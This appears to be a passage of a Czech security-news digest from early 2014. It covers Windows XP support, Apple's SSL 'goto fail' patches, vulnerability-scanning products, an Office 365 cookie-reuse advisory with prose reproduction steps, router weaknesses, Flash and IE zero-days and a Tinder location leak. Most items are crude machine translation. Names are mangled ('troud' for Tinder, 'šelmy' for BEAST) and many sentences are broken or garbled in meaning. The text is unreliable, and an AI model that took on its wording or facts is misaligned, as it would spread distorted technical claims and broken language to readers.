„Ohledně podpory operačního systému Windows XP se vůbec nic nezměnilo,“ uvedla mluvčí Microsoftu v emailu na přímý dotaz, zda Číňané budou mít zvláštní podmínky. Microsoft totiž nedávno uvedl, že spolupracuje s několika čínskými poskytovateli antivirů na zajištění bezpečnostní podpory XP i po 8. dubnu a bude těmto firmám poskytovat informace o nově nalezených zranitelnostech tak, aby tomu mohli přizpůsobit svá řešení. Některá média pak tuto informaci mylně interpretovala tak, že americký gigant plánuje v Číně aktualizovat Windows XP i po 8. dubnu 2014.

„Čínská pobočka Microsoftu úzce spolupracuje s čínskými poskytovateli bezpečnostního softwaru jako Tencent tak, aby byla zaručena bezpečnost čínských uživatelů Windows XP před tím, než přejdou na novější verzi našeho operačního systému,“ uvedl Microsoft na svých webových stránkách.

Dnešní oznámení mluvčí Microsoftu bylo podobné jako to, které Microsoft učinil ve Spojených státech v lednu. Před dvěma měsíci Microsoft přehodnotil svá dřívější rozhodnutí a uvedl, že bude nabízet bezplatný antivirový program Security Essentials pro XP až do 14. července 2015, tedy i více než rok poté, co přestane vydávat opravy pro svůj zastaralý OS. O několik dnů později Microsoft potvrdil, že bude také nadále distribuovat pro uživatele XP do stejného data svůj nástroj s názvem Malicious Software Removal Tool (MSRT).

Německá společnost AV-Test, jež se zabývá pravidelným hodnocením antivirových produktů pro Microsoft, nedávno uvedla, že podle jejích průzkumů většina výrobců antivirů bude pro uživatele Windows XP poskytovat aktualizace databází i poté, co Microsoft ukončí jejich podporu.

Podle nejnovějších statistik analytické společnosti Net Applications byly Windows XP v únoru nainstalovány na 29,5 % všech počítačů na světě. A značné množství uživatelů XP je v Číně. Jak však Microsoft dnes potvrdil, ani Čína nedostane speciální výjimku. „Naše rada uživatelům zůstává pořád stejná – přejděte z Windows XP na moderní operační systém jako Windows 8.1,“ dodala mluvčí.

Microsoft včera mimo jiné vydal nástroj s názvem PCmover Express for Windows XP, který uživatelům usnadní přenos dat, nastavení a profilů z Windows XP na novější verzi jeho OS. Tato aplikace, již vyvinul ve spolupráci se společností Laplink, má být na konci týdne dostupná zcela zdarma na webu windowsxp.com.


Apple konečně záplaty kritické SSL chybu v OS X
4.3.2014 Zranitelnosti
Apple vydal aktualizaci pro OS X, které, mimo jiné, záplaty neslavný "gotofail" chybu , jejíž existence byla veřejně odhalil minulý pátek. chyba byla původně záplatovaný na iOS a Apple TV s aktualizacemi vytlačila téhož dne, ale OS Uživatelé X byly ponechány se ptát, proč oprava nebyla stanovena i pro ně.

Chyba z implementace SSL zranitelné a umožní útočníkovi s výsadní postavení sítě, zachytit a / nebo modifikovat data v relacích chráněných SSL / TLS. Bezpečnostní výzkumníci byli volání pro Apple, aby si pospíšil s oprava, a vytvořili testovací stránky že uživatelé OS X mohl navštívit Safari, zda byly v ohrožení. . Firefox a Chrome použití se doporučuje v mezidobí jako chyba neměla vliv těchto prohlížečů Je zajímavé si uvědomit, že poznámky k verzi pro OS X v10.9.2 Mavericks aktualizace nezmínil chyba je pevná - člověk musel podívat na bezpečnostní stránku Apple pro nová verze, aby zjistil, že to byl (a vidět to, co ostatní věci byly vylepšeny a oprava). Uživatelé jsou vyzýváni, aby aktualizovali své systémy co nejdříve, ale jako Andrew Cunningham uvedeno, přes-400mb aktualizace by mohlo způsobit problémy pro organizace, které mají testovat aktualizace před jeho provedením na svých systémů. "Menší samostatný aktualizaci, která je stanovena pouze goto selhání chyba by být lepší volbou pro podniky," řekl poukázal . Bohužel, v tomto případě musíme brát to, co jsme může dostat, a neočekávám, že Apple komentář nebo vysvětlit, že konkrétní rozhodnutí. Zajímalo by mě, i když, pokud budou nakonec podělit, jak byla chyba objevena, a kým - zejména s ohledem na spekulace .


Identifikovat a opravit chyby zabezpečení vašich SSL certifikátů
3.3.2014 Zranitelnosti
Na tuto měnu oznámil tuto měnu certifikát inspektora , nástroj určený pro rychlé vyhledání problémů v konfiguraci certifikátů a provádění, a poskytuje v reálném čase analýzu celého certifikátu krajiny organizace, včetně ukončení pracovního poměru koncových bodů protokolu SSL.

SSL / TLS certifikáty jsou klíčovým obrana proti nežádoucímu dohledu on-line aktivity uživatelů. Přesto až příliš často správci systému nepodaří správně nakonfigurovat certifikáty, nevědomky odchodu otevřené zranitelnosti. Držet krok s nejnovějšími bezpečnostními osvědčených postupů, jakož i sledování certifikátů je náročný úkol, zejména pro podniky, které spravují tisíce certifikátů. Často, manuální sledování procesů se používají, které zavádějí lidské chyby a způsobit prostoje nebo neznámá slabá místa zabezpečení, jako jsou konfigurace s kódové soupravy odolné vůči zločinu, BEAST, PORUŠENÍ nebo jiné útoky. V ostatních případech, oddělení mimo to by mohlo nasadit své vlastní certifikáty , vytvoření slepé místo pro administrátory. To může také vést k konfiguračních problémů, které downgrade účinnost SSL certifikátů, na kterých organizace spoléhají. Pokud certifikát inspektora, může bezpečnostní profesionálové objevovat zapomenuté, zanedbané nebo chybně nakonfigurován certifikáty, a identifikovat potenciální zranitelná místa, jako jsou slabé klíče, problematické šifer a osvědčení vypršela . Pro každou potenciální hrozby zjištěné, nástroj poskytuje seznam sanacemi. Certifikát inspektor kontroluje síť uživatele odhalovat všechny certifikáty v provozu, kontroluje konfiguraci SSL a provádění, a poté zobrazí výsledky v intuitivním a interaktivním palubní desce. profesionálové zabezpečení může použít nástroj pro:
 

Zjištění jejich bezpečnostní účaří s reálném čase, komplexní přehled o SSL certifikátech a jejich ukončení koncových bodů v celé síti.
Detekce zranitelnosti prostřednictvím skenování pro problematické osvědčení nebo serverových konfigurací a snadno zkontrolovat výsledky pomocí certifikátu inspekční intuitivní dashboard.
Analýza datových bodů bezpečnostních buď kamenivo nebo specifické pro každý certifikát a koncový bod.
Zmírnit zjištěné chyby, jako jsou šelmy, a nedodržování směrnic průmyslu, jako jsou CA / Browser Forum základních požadavků, a to prostřednictvím doporučených kroků.
Obnovit vypršení certifikátů prostřednictvím výslovného dotačního procesu DigiCert je.
Archiv snímků z každé detekční událost dokumentují zlepšení v průběhu času.
Run zprávy z libovolného místa s administrativními kontrolami cloud-based DigiCert je.
Pomocí patentovaného algoritmu, certifikát Inspektor analyzuje SSL certifikáty a zánik koncové body pro mnoho bezpečnostních faktorů, včetně:
Slabé klíče, šifry a hašovací algoritmy
Verze SSL / TLS
Vypršení platnosti certifikátů
TLS opětovné projednání
Perfect Forward Secrecy
Konfigurace náchylnost k trestné činnosti, PORUŠENÍ, BEAST atd.
Jména Neshoda server / certifikát
Chybí AIA je.
Pro každý SSL certifikát a ukončení koncový bod, správci obdrží zprávu o zranitelnosti, odpovídající třídy a rychlý seznam osvědčených postupů ke zmírnění zjištěných nedostatků. "Poskytnutím žalovatelné informace o konfiguraci certifikátů a stavu nasazení, v kombinaci s nápravným nástrojů, DigiCert pomáhá organizacím zavřít Rozdíl mezi zakázek certifikátu a bezpečné nasazení certifikátů, "řekl generální ředitel společnosti DigiCert Nicholas Hales. "Nasazení pevně nakonfigurovaných certifikátů je důležitým linii obrany proti unwelcomed dohledu. Certifikát inspektor pomůže organizacím zářit světlo na oblastech spadajících do jejich sítě, které by mohly představovat číhající hrozby. Věříme, že tento nástroj může stavět na úsilí druhých v bezpečnostní komunity s cílem zlepšit on-line důvěru v nové, hmatatelným způsobem. "


Zdarma řízení zranitelnost služeb pro malé a střední firmy
3.3.2014 Zranitelnosti
Tripwire debutoval Tripwire SecureScan, zdarma, cloud-based služeb pro správu zranitelností pro (IP adresy) až 100 Internet Protokolu o vnitřních sítí. Tento nový nástroj umožňuje správu slabých míst snadno dostupné pro malé a střední podniky, které nemusí mít prostředky pro bezpečnostní technologie podnikové třídy.

Menší podniky obvykle mají méně prostředků na investice do bezpečnosti, což je velmi atraktivní pro cyberattackers a podle společnosti Symantec, kybernetickým útokům na malé a střední podniky se zvýšil o 300 procent v roce 2012. Malé a střední podniky často spoléhají na anti-virus software a firewally, ale tyto bezpečnostní kontroly, zatímco užitečný, nestačí, protože nemají odhalit neopravených systémy, které jsou často cílené u cyberattackers. Tripwire SecureScan je komplexní řešení pro správu zranitelností, které nevyžaduje žádné hardware nebo Software musí být instalován a spravován. Organizace všech velikostí mohou využít službu zjistit podrobné informace o síťových zařízení a najít slabá místa v hardwarových a softwarových aplikací, které jsou používány v kybernetickým útokům. Řešení objeví tyto chyby a pak poskytuje uživatelům priorit, Podrobné informace o tom, jak opravit tyto bezpečnostní slabiny. To používá stejný osvědčené podnikové třídy pro skenování zranitelností platformy za Tripwire v produktech zranitelnosti Tripwire IP360 a Tripwire PureCloud Enterprise. . Tyto produkty chrání mnoho z největších a nejvíce citlivé sítí na světě Klíčové SecureScan funkce patří:
 

Volný vnitřní skenování zranitelnosti až 100 zařízení čtyřikrát měsíčně.
Snadná objev ztracené nebo skryté zařízení, které může vyústit v bezpečnostní slepých míst.
Prioritní zranitelnost bodování, který umožňuje nejprve opravit nejdůležitější bezpečnostní problémy.
"Organizace, které žijí" pod hranicí chudoby zabezpečení "jsou řezání zatáček na bezpečnost po celou dobu," řekla Wendy Nather, ředitel výzkumu, podnikání bezpečnostní praxe na 451 Research. "Oni nemusí mít odborné znalosti naladit a používat open source nástroj, a to buď. S komerční produkt k dispozici na nich zdarma vám může pomoci tyto podniky dostat nohu -. V některých případech poprvé "


Apple opravuje kritickou šifrovací chybu v iOS, OS X fix být propuštěn "brzy"
2.3.2014 Zranitelnosti
V pátek Apple oznámil propuštění aktualizaci softwaru pro svůj mobilní operační systém iOS, který řeší kritické šifrování chybu. Podobný aktualizace také byl propuštěn pro Apple TV.

Zdá se, že tam bylo pár chybějící validace kroků, které z implementace SSL zranitelné a umožní útočníkovi s výsadní postavení sítě, zachytit a / nebo modifikovat data v relacích chráněných SSL / TLS - ve skutečnosti, se připojit man-in- -Middle útok. iPhone a iPad uživatelům se doporučuje provést aktualizaci na verzi 7.0.6 nebo 6.16 z OS co nejdříve, a uživatelé OS X jsou vyzýváni, aby se zabránilo používání veřejné sítě, dokud stejná oprava je propuštěn pro OS. Podle různých zdrojů, prohlížeč Apple Safari a výchozí Mail.app jsou jak zranitelné, ale Firefox a Chrome nejsou ovlivněny, takže uživatelé systému Mac může dočasně přepínat s pomocí těch. Apple slíbil uvolnit OS X opravu "brzy". Vědci, kteří mají Testované starší verze obou iOS a OS X k závěru, že chyba byla přítomna měsíců. bezpečnostní výzkumník Google Adam Langley je vysvětleno , jak se vada funguje a kde chyba se stalo ve zdrojovém kódu. jednoduchosti chyby a skutečnost, že by mohla umožnit někdo - a zejména zpravodajské agentury - to využít pro špehování uživatelů vedla ke spekulaci, že je to existence mohla být úmyslné. Druhou možností je, že Apple má špatnou proces kód recenze na svém místě. Problém také lidé kritizují Apple preference pro proprietární uzavřený zdroj. Tvrdili, že takový do očí bijící chyba by mohla být spatřen před věky, pokud více výzkumníků bezpečnosti měl možnost přezkoumat kód.


Office 365 - Účet únos Cookie Re-Use Chyba, prodlužuje

1.3.2014 Zranitelnosti

Název:
Office 365 - Účet únos Cookie Re-Use Chyba, rozšířené Prodávající: - Microsoft produkty postižené: - Office 365 E3 balení (verze od 22 února 2014) - SharePoint Online Services Abstrakt: Známý účet únos přes cookie re použití vada byla původně hlášena v červenci 2013 prof Sam Bowne a projednán v několika ? stejně jako původní zranitelnost hasn t Beed uzavřeny této zprávy, je tu další vážný dopad na poražení tuto chybu: - Změna hesla uživatele neruší ukradené cookie - Blokování účtu (uživatel uzamčení) nebude fungovat jako dobře . To umožňuje útočníkovi zneužít uživatelský účet po dobu nejméně 23 let, než byl účet zcela vymazán Kroky pro reprodukci: * Předpoklady: - Office 365 účtu (E3 balíček s Sharepoint Services) - Jak škodlivého systém: Windows O / S Client a Interner Explorer 9 až 11 nebo Firefox 25 + (Jiné operační systémy a prohlížeče dosud nebyly testovány), cookies, nesmí být odstraněny při zavření prohlížeče. - pouze ověřování hesla použít (výchozí) * Příprava kroky: 1) Přihlášení uživatele o použití nedůvěryhodné zařízení (např. internetová kavárna) se office365 přes oficiální Microsoft Online portál login.onmicrosoft.com s nastavením?, aby mi byly podepsány dne? 2) uživatel se dostane k jeho povolených webových stránek týmu na SharePoint Services, např.. replacethiswithyourtestsite.onmicrosoft.com 3) uživatel nyní opustí nedůvěryhodný zařízení buď vypnutím počítače, zavřete prohlížeč nebo jen odhlásili pouze z os, s ), není odhlášení z aplikace Microsoft portálu správně b) a není čistil Cookies * Známá První část - Cookie opětovné použití vada: 4) Uživatel se zlými úmysly (předvečer) lze použít (důvěrné) SharePoint url jednoduše znovu pomocí cookie. 5) Z platného Sharepoint Online Services přístup všechny ostatní služby lze být přístupné (OWA, SkyDrive a tak dále), zatímco osvěžující své pověření cookies, * rozšíření chyba - může t blokování útočník:? 6) Je-li uživatel by mohl být vědomi své poruchy, nebo je detekován zneužití, uživatel se může pokusit změnit své heslo nebo nechat správce resetovat heslo uživatele nebo . 7) Správce může rozhodnout o zablokování účtu od připojení pomocí oac 8) V obou směrech, ukradený cookie bude stále možné přijímat (viz kroky 4 a 5.) Prodávající odezvy: - problém byl ohlášen společnosti Microsoft v několika způsoby: - Ticket 1235308167 (podpora Microsoft USA) - Ticket 201402160322129434 (Microsoft Partner Support Německo) - Ticket 114021011169872 (Microsoft Office Online Uživatelská podpora Německo) - Žádné řešení nabídl tak daleko, ale problém byl uznán by Microsoft Partner německou podporu řešení: -. Z forenzních důvodů by mohlo být to nedoporučuje, ale v té době jsem don t vidět nějaké jiné řešení, jediný způsob, jak je úplně odstranit napadl účtu - Tento způsob je shodný s řešení společnosti Microsoft nabízí jako řešení ve svém internetovém fóru.


Bezpečnostní chyby nalezené v 80% nejprodávanější SOHO bezdrátových směrovačů
28.2.2014 Zranitelnosti
Tripwire analyzoval bezpečnost poskytované z nejoblíbenějších bezdrátových směrovačů používány v mnoha malých a domácích kanceláří a zjistil, že 80 procent z top 25 nejprodávanějších SOHO bezdrátových modelů routerů Amazon se chyby zabezpečení.

Z těchto ohrožených modelů, 34 procent veřejně zdokumentováno exploity, které dělají to relativně jednoduché pro útočníky k řemeslu buď vysoce cílené útoky nebo obecné útoky na každý zranitelný systém, které můžete najít. Směrovače jsou ideálním cílem pro cyberattackers, protože mohou být použity k odposlouchávat provoz poslal do a ze sousedních přístupových firmě bodů. Poté, co útočník získal kontrolu nad routeru, jsou schopni sledovat, přesměrovat, zablokovat nebo jinak manipulovat s celou řadou on-line aktivit. Jakmile router je ohrožena, zařízení hlídané routeru firewall stát cílů pro další útoky ze sítě. Dokonce i technicky orientované uživatele je obtížné určit bezdrátový router kybernetického útoku, protože router uživatelská rozhraní jsou minimální, a provoz poslal z ohrožení zařízení . cyberattackers je obvykle neviditelné nálezy Klíčové studie patří:

30 procent IT profesionálů a 46 procent zaměstnanců se nezmění výchozí heslo správce na svých bezdrátových směrovačů. S přístupem do konfiguračního rozhraní, útočníci mohou snadno ohrozit zařízení.
55 procent IT profesionálů a 85 procent zaměstnanců se nezmění výchozí adresu IP (Internet Protocol) na svých bezdrátových routerů, což Žádost o Cross-Site padělání (CSRF) útočí mnohem jednodušší pro cyberattackers.
43 procent IT profesionálů a 54 procent zaměstnanců pomocí Wi-Fi Protected Setup (WPS) - nejistý standardní, že je to jednoduché pro útočníci objevit routeru šifrování frázi, bez ohledu na jeho složitost a sílu.
52 procent IT profesionálů a 59 procent zaměstnanců neaktualizovali firmware na svých routerech na nejnovější verzi, takže i když bezpečnostní aktualizace od routeru dodavatelů jsou k dispozici, většina uživatelů neobdržíte dodatečnou ochranu.
Několik klíčových bezpečnostních postupů může pomoci uživatelům může účinně omezit Bezdrátový router kybernetickým útokům. Nicméně, studie Tripwire v bezdrátových bezpečnostních router postupů mezi IT profesionály a zaměstnanců, kteří přístup k podnikovým sítím ze vzdálených míst ukazuje, že tyto praktiky nejsou široce používány. "Vert v oblasti výzkumu a SANS nedávný objev The Moon červa v současné době infikování vystavené Linksys routery znamená, že ohrožení směrovače bude i nadále zvyšovat, jak škodlivé herci poznat, kolik informací lze získat tím, že napadne těchto zařízení, "řekl Craig Young, bezpečnostní výzkumník Tripwire. "Bohužel, uživatelé nemají změnit hesla výchozí správce nebo výchozí IP adresy v těchto zařízeních a Toto chování, spolu s převahou ověřování bypass zranitelnosti, otevírá dveře pro rozsáhlé útoky prostřednictvím škodlivých webových stránek, pluginy a smartphone aplikace, "dodal Young.


Adobe opravuje Flash 0-day
28.2.2014 Zranitelnosti
Adobe vydala své druhé out-of-band aktualizace pro Adobe Flash tento měsíc. APSB14-07 řeší tři zranitelnosti v Adobe Flash, včetně chyby CVE-2014 do 0502, které se používají ve volné přírodě k útoku uživatelů se zlými úmysly prostřednictvím webové stránky. The 0-day chyba v přehrávači Flash CVE-2014-0502 byla objevena asi před týdnem by FireEye , které uvádí, že byl nalezen na třech webových stránkách, které jsou provozovány neziskovými institucemi. Naštěstí organizace, které jsou spuštěny nejnovější operační systémy a aplikační kód nejsou ovlivněny útoku. Chybí jim zranitelné komponenty, které umožňují útok přijít k úspěšnému závěru. Zejména útok potřebuje, aby se vyhnula ASLR, aby byla úspěšná, a proto se zaměřuje pouze na určité konfigurace:

Windows XP (což nemá ASLR)
Windows 7 s nainstalovanou Javu 1.6, který umožňuje pro ALSR bypass, ale Java 1.6 je EOL již a obecně náchylnější k jiným využije
Windows 7 s plně aktualizovanou verzi sady Office 2007 nebo Office 2010, také citlivé na jiné využije.
Naše doporučení je aktualizovat tak rychle, jak je to možné. Organizace, které provozují některé z výše uvedených organizací, je třeba to udělat tak rychle, jak je to možné, jiní mohou vrátit tuto opravu na normální plánu, ale je třeba si uvědomit, že útočníci mohou změnit své taktiky kdykoli zneužít další softwarové balíčky, které také únik paměťových míst. Společnost Microsoft aktualizuje poradní KB2755801 , která centralizuje aktualizace Flash v aplikaci Internet Explorer 10 a 11.. Uživatelé IE10 nebo IE11, stejně jako Google Chrome nemusíte aktualizovat Adobe Flash odděleně, ale místo toho je řešen prostřednictvím svých prohlížečů automaticky. Autor: Wolfgang Kandek, CTO, Qualys.


Problémy Microsoft Fix it kritické IE 0-day využívány při útocích
28.2.2014 Zranitelnosti

Microsoft konečně vydala bezpečnostní poradenství zabývající IE zero-day, která byla v nedávné době aktivně využit v útocích ve volné přírodě , a následoval s Fix It nástroj dočasně zmírnit problém, dokud nebude vydána oprava. Tento zero-day je vzdálené spuštění kódu, která může poškození paměti a umožňuje útočníkovi spustit libovolný kód v kontextu aktuálního uživatele v aplikaci Internet Explorer. Tato chyba je snadno spouští, a vyžaduje, aby cíle jednoduše návštěvě speciálně vytvořené webové stránky hosting využívat, nebo webové stránky, které přijímají nebo hostující materiál poskytovaný uživateli obsah nebo reklamy, které bya mohly tuto chybu zabezpečení zneužít. Je to jen otázka láká uživatele na takovém místě. pouze Internet Explorer 9 a Internet Explorer 10 arů touto chybou zabezpečení ohroženy -. přestože puntíkovaný útoky soustředily na kompromisu pouze IE 10 uživatelů IE verze 6, 7, 8 a 11 nejsou dotčena a Microsoft radí uživatelům, aby se ochránili upgradem na nejnovější verzi zpřístupněna. Ti, kteří nemohou aktualizovat v tomto okamžiku, můžete si stáhnout konkrétní spravit nebo instalovat Enhanced Experience Toolkit pro zmírňování (Emet), jak využít zabraňuje sám z provozu, pokud zjistí, Emet na cílovém počítači. "Na dokončení tohoto šetření, bude společnost Microsoft proveďte příslušnou akci k ochraně našich zákazníků, které mohou zahrnovat poskytování řešení prostřednictvím naší měsíčně vydávané aktualizace zabezpečení, nebo out-of- cyklu aktualizací zabezpečení, v závislosti na potřebách zákazníka, "došli k závěru.


Major zranitelnost v troud datování app povoleno sledování uživatelů
28.2.2014 Zranitelnosti

Zahrnout Security představila nový výzkum ukazuje, že uživatelé populární online dating app troud byly významným rizikem kvůli zranitelnosti objevili v geo-umístění funkce aplikace. Tato chyba zabezpečení dovolil uživatelům troud sledovat každý další je přesné umístění pro hodně z roku 2013.

Vědci poprvé objevili chybu a nahlásil na troud loni na podzim, citovat, že chyba zabezpečení umožňuje každému uživateli Tinder najít místo jiného uživatele, pokud aplikace Tinder běží, nebo jejich poslední známé místo, pokud ne. Použití algoritmu s názvem trilaterace, výzkumných pracovníků byli schopni získat přesné zeměpisné šířky a délky koordinuje pro všechny uživatele troud. Každý, kdo s primitivní znalosti programování by mohlo dotaz troud API přímo a strhnout souřadnic každého uživatele. To vedlo k porušení ochrany osobních údajů pro uživatele aplikace. Erik Cabetas, managing partner a zakladatel Zahrnout řekl Security "Vzhledem k troud architektury, to není možné, aby jeden uživatel Tinder vědět, pokud jiný využil této zranitelnosti v průběhu Doba expozice. Následky zranitelnost tohoto typu byly všudypřítomné vzhledem troud masivní globální základnu uživatelů. Jakmile se náš výzkumný tým objevil, jsme informovali zranitelnost přímo na troud a navázala několikrát mezi říjnem a prosincem 2013 bylo zajištěno, že jsou řešení problému. " V určitém bodě v období mezi prosincem a začátkem ledna, Tinder dělal vydat opravu tohoto problému. "Jak více a více aplikací jsou postaveny obsahovat geo-lokalizační služby, je zde zvýšené riziko pro soukromí a bezpečnost Uživatelé, "dodal Cabetas. "Aplikační prodejci a vývojáři mají odpovědnost za zajištění soukromí svých uživatelů, a bezpečnosti je chráněna, zranitelnosti jsou sděleny okamžitě, a priorita je věnována rozvoji důležité opravy, jako je tento." Tady je video z zranitelnosti v akci:


96 procent z aplikací mají bezpečnostní chyby
28.2.2014 Bezpečnost | Zranitelnosti

Zlepšení záplat a bezpečných kódovacích postupů udělali mírný vliv na výskyt slabých míst, podle nové zprávy Cenzic.

Nicméně, vznik BYOD, cloudových služeb a mobilních aplikací - a pokračoval selhání organizací odhalit a řešit využije kolem úniku informací, autentizace a autorizace, a správu sezení se držet zranitelnosti téměř všudypřítomný. Ve skutečnosti, střední počet zranitelností na aplikace - 14 - je ve skutečnosti větší, než tomu bylo v předchozím roce - 13. Zpráva odhalila širokou škálu poznatků, pokud jde o aplikační zranitelnosti, včetně:

Trvalý nárůst výskytu bezpečnostní chyby v mobilních aplikacích. Zpráva zjistila, že porušení soukromí a nadměrné výsady se objeví ve více než 80 procent mobilních aplikací.
Zvyšující se výskyt zranitelnosti nalezené v aplikacích sdíleny s třetími stranami. Cloud poskytovatelé služeb a partnery v dodavatelském řetězci, které mohou být mimo sféru organizace vlivu jsou hlavním zdrojem hrozeb dnes.
Únik informací je způsobena zranitelných aplikací. Kolem 23 procent zranitelností byly v souvislosti s únikem informací, ve kterém aplikace nevhodně odhaluje citlivá data, jako jsou technické informace o aplikaci nebo data specifická pro uživatele.
Problém prastarý of Cross-Site Scripting (XSS) je stále na vině. Některé 25 procent zranitelností byly v souvislosti s cross-site scripting (XSS), ve kterém aplikace umožňuje útočníkům posílat škodlivé skripty předávání skript z jinak důvěryhodné adresy URL.
Smíšené zranitelná místa v jiných oblastech, nemůže být ignorována. Nedostatky v ověřování a autorizace tvoří 15 procent zranitelností, a chyby řízení relace tvořily 13 procent.
Mnoho z dnešních slabých míst - dokonce i ty, které jsou relativně nové - lze předcházet. Cenzic nastínil některé klíčové osvědčené postupy připomínat podniky některých jednoduchých řešení, která mohou pomoci zabezpečit jejich aplikace: . realizovat bezpečné postupy psaní kódu Jedná se o techniky používané vývojáři aplikací odvrátit potenciální narušení bezpečnosti. Konzistentní, kvalitní kódovací postupy jsou nejúčinnější odrazující prostředek vůči útokům. Použití firewallů pro webové aplikace (Wafs). Wafs umožňuje blokování na základě zásad konkrétních zranitelností, které existují v aplikacích, bez přepisování kódu aplikace. Wafs jsou zvláště efektivní metoda pro rychlé zablokování chybu našel v aplikaci produkce, aniž by bylo nutné plně re-vydání žádosti obsahující zranitelnosti. zajistit správné konfigurace serveru. To je řada postupů pro správu serveru hardwaru, operačních systémů a Osvědčení o bezpečnosti na zařízení se systémem konkrétní aplikaci.


Největší obavy chybějící hrozeb mezi zranitelností bezpečnostních profesionálů
26.2.2014 Zranitelnosti
Kontinuální monitoring, jehož kořeny leží s americkou vládou, řeší mnohé z problémů, jimž čelí tradiční řešení pro správu zranitelností a nabízí CISO a vedoucí bezpečnosti napříč odvětvími blízko real-time pohled na bezpečnostní pozici svých institucí. Nový průzkum zjistil, že Organizace, které zavedly průběžné sledování jsou více než dvakrát vyšší pravděpodobnost, že je spokojen s jejich přístupem pro správu zranitelností ve srovnání s těmi, kteří používají periodické skenování. Navíc Forrester zeptal se 45 procent respondentů, kteří se přijala CM vysvětlit výhody. Říkali, že kontinuální monitorování:

Výhody všechny fáze řízení zranitelnosti
Výhody všechny vertikály
Lepší vybavuje organizace vypořádat s mobilní pracovní síly
Výhody ty s rizikem VM programu nejvíce zaměřuje
Splňuje CISO více než jakýkoli jiný roli.
Konzumerizace, mobilita a cloud jsou charakteristickými znaky rozšířeného podniku, a pravidelné snímek skenování zranitelnosti nelze účinně řešit dynamickou povahu dnešních rozšířených podnikových prostředích. I když to katapultovalo řízení zranitelnosti jako jeden z nejlepších obav pro organizace - 86 procent respondentů hodnotí to jako jejich druhý nejvyšší bezpečnosti IT priority pro příštích 12 měsících - zůstávají zabývající se účinně snižuje riziko jejich organizace kompromisu. . Konkrétně, organizace se snaží zavést účinné postupy řízení zranitelnosti, takže je vystaven útokům Studie zjistila, že:

Téměř 74 procent dotázaných respondentů potýkají s problémy s jejich celkovým programem VM
79 procent tvrdili, že byli s větší pravděpodobností chybět kritické zranitelnosti vzhledem k nedostatečným údajům zúžit vhodné koncové body pro skenování
70 procent skenování měsíčně nebo méně.
"Průzkum ukazuje, že i když organizace používají pravidelné prověřování zranitelnosti, je to prostě nestačí," vysvětlil Ron Gula, CEO a CTO Tenable Network Security. "V dnešním prostředí mobilní, oblačnosti a BYOD, rozšířený podnik představuje zvláštní problémy, a organizace zjišťují, že je obtížné, aby se tradiční správu slabých míst práce pro ně. Potřeba bezpečnosti, která pokrývá 100 procent aktiv po celou dobu nikdy nebylo více zřejmé, než s nedávnou sérii úspěšných porušení. " Udržení konzistentní a efektivní správu slabých míst pracovního postupu se ukázal jako hlavní problém 77 procent respondentů má obavy o přesné objev aktiv. Exploze přechodných koncových sloučenin obtíže objevují majetek v organizaci a výrazně zvyšuje pravděpodobnost účinného porušení, pokud jsou neznámé aktiva nejsou identifikovány a řádně posouzeny. Navíc, 66 procent uvedlo, že nebyli jisti v provádění správné zranitelnosti nápravu. Poté, co snímá data vrácena, neměli pocit, že měli jasnou představu o rizicích tak, aby se přesně stanovení priorit jednat. "Pravidelné skenování zranitelnosti selhaly v novodobé CISO," řekl Gula. "Porušení se stále vyskytují alarmující rychlostí, a hrozeb se neustále vyvíjí. Cílem pro jakékoliv CISO je zůstat na špici ohrožení, a jediný způsob, jak to udělat, je přes přijetí kontinuální monitorovací platformu. To umožňuje uživatelům rychle nasadit záplaty vypnout těmto hrozbám v hodinách, nikoli měsíců, aby nebezpečné okna příležitost se zavřel před business-critical data jsou ohrožena.


Odstranění administrátorská práva zmírňuje 92% kritických zranitelností Microsoft
26.2.2014 Zranitelnosti
Avecto analyzovali data z bezpečnostních bulletinů vydaných společností Microsoft v průběhu roku 2013 a dospěl k závěru, že 92% všech chyb než Microsoft s kritickým stupněm závažnosti lze zmírnit tím, že odstraní administrátorská práva.

Výsledky také ukázaly, že odstranění administrátorská práva by zmírnily 96% kritické zranitelnosti, které ovlivňují operační systémy Windows, 91% kritické zranitelnosti, které ovlivňují Microsoft Office a 100% zranitelností v aplikaci Internet Explorer. Pokud malware infikuje uživatele s právy administrátora, může to způsobit neuvěřitelnou škodu místně, ale i v širším síti. . Navíc, zaměstnanci s právy administrátora mají přístup k instalaci, upravovat a mazat software a soubory, stejně jako měnit nastavení systému Paul Kenyon, spoluzakladatel a viceprezident pro Avecto řekl: "Nebezpečí právy administrátora byly dobře zdokumentovány na nějakou dobu, .. ale co víc o je počet podniků se mluvit, že stále ještě nejsou plně vědomi, kolik uživatelů admin mají Bez jasnou viditelnost a ovládání, které se potýkají s neznámou a vyčíslen bezpečnostní hrozbu " dospěl k závěru, Paul: "Tato analýza se zaměřuje čistě na známé zranitelnosti, a počítačoví zločinci budou rychle využít chyb, které jsou neznámé dodavatelům. Obrana proti těmto neznámým hrozbám je obtížné, ale odstranění administrátorská práva je nejúčinnější způsob, jak to udělat. "


Apple vydal OS X 10.9.2 záplatování SSL zranitelnost a aktualizuje Safari

26.2.2014 Zranitelnosti
Apple vydal aktualizaci pro OS X, který záplaty SSL zranitelnost diskutovali Rick v neděli . Pro více informací navštivte stránku společnosti Apple o tom . Kromě toho Apple také vydal aktualizaci zabezpečení pro Safari a QuickTime .


Aktualizace Apple iOS a Apple TV
22.2.2014 Zranitelnosti

Apple rozeslal 3 bulletiny a aktualizace OS dnes (iOS 6.1.3, iOS 7.0.6, a Apple TV 6.0.2), všechny, kterým se stanoví chybu, která by mohla povolit SSL / TLS spojení být citlivé na nezjištěný man-in-the- střední útoky. Všechny tři aktualizace sdílejí stejné číslo CVE CVE-2014-1266. Aktualizace stránky Apple Bezpečnost dosud Zdá se, že aktualizace uvedené tam, ale měly by tam být krátce (může tam být v době, kdy budete číst tento). Pokud máte zařízení Apple se systémem iOS 6 nebo 7, nebo Apple TV, asi byste měli používat tyto aktualizace ASAP.

Ref: Aktualizace zabezpečení Apple strana - http://support.apple.com/kb/HT1222


FireEye zprávy IE 10 zero-day používán v zalévání otvorů útoku

15.2.2014 Zranitelnosti

Dobří lidé FireEye Labs zanecháno objevu IE 10 zero-day používán v zavlažování díra útoku na porušené serveru ve Spojených státech [1].

FireEye pracujeme spolu s Microsoftem, takže detaily jsou poměrně tenké . Chcete-li citovat ze svého prvního krátkého blogu:

"Je to zbrusu nový zero-day, který se zaměřuje IE 10 uživatelů navštěvující ohrožena webové stránky-klasický drive-by download útoku. Po úspěšném využití, to zero-day attack stáhne XOR kódovaný náklad ze vzdáleného serveru, dekódování a spustit jej . "

